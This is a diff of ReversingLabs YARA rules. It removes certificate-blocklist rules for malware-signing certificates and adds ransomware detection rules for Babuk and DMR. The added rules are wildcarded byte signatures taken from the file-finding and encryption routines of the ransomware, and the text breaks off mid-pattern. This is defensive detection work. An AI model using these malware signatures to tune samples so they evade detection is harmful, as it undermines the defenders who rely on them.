-import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Babuk : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Babuk ransomware." author = "ReversingLabs" - id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3" - date = "2023-11-08" - modified = "2023-11-08" + id = "8a96f400-193f-5fd1-ba03-4da464345e1c" + date = "2021-01-26" + modified = "2021-01-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1690-L1706" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Babuk.yara#L1-L117" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "70327b3f9d0b0505ade7ee6de6d7facf56820c7e8477bd172f738f374311144f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Babuk" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 8B + 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? + ?? ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 73 ?? 8B 85 ?? ?? ?? ?? 8B + 0C 85 ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? + ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? + 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 74 ?? 83 7D ?? ?? 77 ?? 8B 45 ?? 83 + C0 ?? 50 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 7C ?? 8B 95 ?? ?? ?? ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? + ?? ?? 8B 8D ?? ?? ?? ?? 8D 94 4D ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ?? + EB ?? EB ?? EB ?? EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? + ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 50 FF 15 + } + $encrypt_files_p1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD + ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? + ?? ?? 7F ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B + 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 52 50 E8 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D + ?? ?? ?? ?? 83 C1 ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? + 83 BD ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 + } + $encrypt_files_p2 = { + E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 68 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? + 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 + FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8C ?? ?? ?? + ?? 7F ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 + ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? + ?? ?? 74 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? + ?? ?? 50 8B 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + } + $encrypt_files_p3 = { + C4 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 45 + ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF + 15 ?? ?? ?? ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? + ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? + ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50 6A + ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? + ?? ?? 52 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? + 3B 95 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BC 05 ?? ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? 69 8D ?? ?? ?? ?? ?? ?? ?? ?? 81 BC 0D ?? ?? ?? ?? ?? ?? ?? + ?? 74 ?? FF 15 ?? ?? ?? ?? 69 95 ?? ?? ?? ?? ?? ?? ?? ?? 3B 84 15 ?? ?? ?? ?? 74 ?? + 69 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8C 05 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? + ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $enum_resources = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? + ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 + ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 45 ?? ?? ?? + ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 73 ?? 8B 45 ?? C1 E0 ?? 8B + 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? EB ?? 6A ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB + ?? EB ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 4D ?? 33 + CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures[i].serial=="3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($enum_resources) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DMR ransomware." author = "ReversingLabs" - id = "17c99772-f2f9-56bc-be01-d9f62626a9ff" - date = "2023-11-08" - modified = "2023-11-08" + id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1708-L1724" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DMR" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SBO INVEST" and pe.signatures[i].serial=="0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1726-L1742" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 + 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? + 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? + ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? + ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B + CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? + 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 + 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 + ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 + } + $find_files_p2 = { + 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? + ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? + ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? + 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? + ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? + 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA + ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 + E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? + ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ?? + 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43 + } + $encrypt_files_p2 = { + 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D + ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? + ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ?? + ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75 + ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ?? + ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ?? + ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ?? + EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03 + } + $encrypt_files_p3 = { + F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A + ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 + ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? + 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D + 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B + 08 6A ?? 8B 11 8B C8 FF D2 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 D2 8B 40 ?? 03 C8 + B8 ?? ?? ?? ?? 39 51 ?? 0F 45 C2 EB ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? + 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 6A ?? 50 E8 ?? ?? ?? ?? + 81 C6 ?? ?? ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 + ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 + } + $encrypt_files_p4 = { + C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B 47 ?? 72 ?? 8B 3F 83 F8 ?? 75 + ?? 0F B6 07 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B BD ?? ?? ?? ?? 85 C0 75 ?? 8D + 45 ?? 50 83 EC ?? 8D 87 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC + ?? C6 45 ?? ?? 8B CC 56 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? EB ?? 8B BD ?? ?? + ?? ?? 8D 45 ?? 3B F0 74 ?? 83 7D ?? ?? 8B CE FF 75 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? + 8D 45 ?? 3B C6 74 ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 FF 76 ?? 8D 4D ?? 50 E8 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 C7 46 ?? + ?? ?? ?? ?? 8D 55 ?? C6 00 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? FF 75 ?? 0F 43 55 ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? + 0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D + 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8B C8 C6 + 45 ?? ?? 8B 41 ?? 8B 51 ?? 2B C2 83 F8 ?? 72 ?? 83 79 ?? ?? 8D 42 ?? 89 41 ?? 8B C1 + 72 ?? 8B 01 66 C7 04 02 ?? ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 0F 10 01 0F 11 85 ?? ?? ?? ?? F3 0F 7E 41 ?? 66 0F D6 85 ?? ?? ?? ?? + C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 8B + } + $encrypt_files_p5 = { + C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? 72 ?? 8D 41 ?? 83 FA ?? 89 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? C7 04 01 ?? ?? ?? ?? C6 44 01 ?? ?? 8D 85 ?? ?? ?? + ?? EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? + ?? 6A ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 0F 10 00 0F 11 85 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 85 ?? ?? ?? ?? C7 40 ?? ?? ?? + ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8D 